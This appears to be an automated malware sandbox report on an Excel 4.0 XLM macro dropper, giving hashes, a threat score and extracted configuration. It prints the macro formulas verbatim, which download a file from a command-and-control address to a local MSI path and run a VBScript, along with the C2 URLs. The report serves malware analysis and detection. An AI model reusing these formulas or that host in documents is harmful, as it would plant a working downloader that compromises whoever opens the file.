General

  • Target

    2344185e02a96521e5ac17dbb8a55925

  • Size

    6KB

  • Sample

    231221-3bdcjscba5

  • MD5

    2344185e02a96521e5ac17dbb8a55925

  • SHA1

    2940d4d487805f44cdc9b0913bdc87eb0aafb5fb

  • SHA256

    da20d944dd67217f92a665fa9941e8df2635a18fe1d2e13b3a19ab6831dd0b6f

  • SHA512

    645ed27415956266fb3833d9f08ae66fcb468ec1d3c4613efadb9c0a48651e20c68b20207dd19d4eb47f2e708f7e601d098990f0d23e67a86e6dc5bcfa172bf2

  • SSDEEP

    192:NDSkuSGbrA2OmmfRh8UhHFBFYuvb98y6Vn8pn++Dn2znRW:NHu3M2wj1FYab98y6Vn8pnXn2znRW

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      2344185e02a96521e5ac17dbb8a55925

    • Size

      6KB

    • MD5

      2344185e02a96521e5ac17dbb8a55925

    • SHA1

      2940d4d487805f44cdc9b0913bdc87eb0aafb5fb

    • SHA256

      da20d944dd67217f92a665fa9941e8df2635a18fe1d2e13b3a19ab6831dd0b6f

    • SHA512

      645ed27415956266fb3833d9f08ae66fcb468ec1d3c4613efadb9c0a48651e20c68b20207dd19d4eb47f2e708f7e601d098990f0d23e67a86e6dc5bcfa172bf2

    • SSDEEP

      192:NDSkuSGbrA2OmmfRh8UhHFBFYuvb98y6Vn8pn++Dn2znRW:NHu3M2wj1FYab98y6Vn8pnXn2znRW

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks